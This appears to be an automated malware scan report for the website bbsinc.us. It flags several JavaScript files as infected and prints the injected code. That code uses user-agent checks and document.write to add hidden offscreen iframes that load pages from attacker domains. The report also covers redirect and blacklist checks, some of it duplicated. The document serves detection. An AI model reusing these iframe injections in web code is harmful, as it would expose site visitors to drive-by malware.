Scanned pages/files
Request | Server response | Status |
http://www.bbsinc.us/ | 200 OK Content-Length: 23060 Content-Type: text/html | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 580 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/media/system/js/caption.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 578 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: plarosigahyet.savannahcrimes.com function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas(); Decoded script: <iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://plarosigahyet.savannahcrimes.com/lauritosman15.html This URL is marked by Google as suspicious <iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"> | ||
http://www.bbsinc.us/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 2165 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://duislow.voiceofpalmsprings.com/nuniojetos15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Antivirus reports:
| ||
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/base.js | 200 OK Content-Length: 583 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 1433 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var YOOAccordionMenu = new Class({
initialize: function(togglers, elements, options) { this.setOptions({ accordion: 'default' }, options); this.togs = togglers; this.elms = elements; switch(this.options.accordion) { case 'slide': this.createSlide(); break; default: this.createDefault(); } }, createDefault: function() { var options = {}; if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) { fx.hide(); } span.addEvent('click', function(){ fx.toggle(); }); }.bind(this)); } }); YOOAccordionMenu.implement(new Options);document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" Antivirus reports:
| ||
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/fancymenu.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 570 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/yoo_tools.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/wthvideo/wthvideo.js | 200 OK Content-Length: 570 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/index.php?option=com_contact&view=contact&id=1&Itemid=125 | 200 OK Content-Length: 16144 Content-Type: text/html | clean |
http://www.bbsinc.us/media/system/js/validate.js | 200 OK Content-Length: 4397 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JFormValidator = new Class({ initialize: function() { this.handlers = Object(); this.custom = Object(); this.setHandler('username', function (value) { regex = new RegExp("[\<|\>|\"|\'|\%|\;|\(|\)|\&]", "i"); return !regex.test(value); } ); this.setHandler('password', function (value) { regex=/^\S[\S ]{2,98}\S$/; return regex.test(value); } ); this.setHandler('numeric $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" width="499" Antivirus reports:
| ||
http://www.bbsinc.us/index.php?option=com_content&view=article&id=116&Itemid=124 | 200 OK Content-Length: 17391 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bbsinc.us
Result:
GET / HTTP/1.1
Host: bbsinc.us
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bbsinc.us
Referer: http://www.google.com/search?q=bbsinc.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bbsinc.us
Referer: http://www.google.com/search?q=bbsinc.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bbsinc.us
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bbsinc.us/
Result: bbsinc.us is not infected or malware details are not published yet.
Result: bbsinc.us is not infected or malware details are not published yet.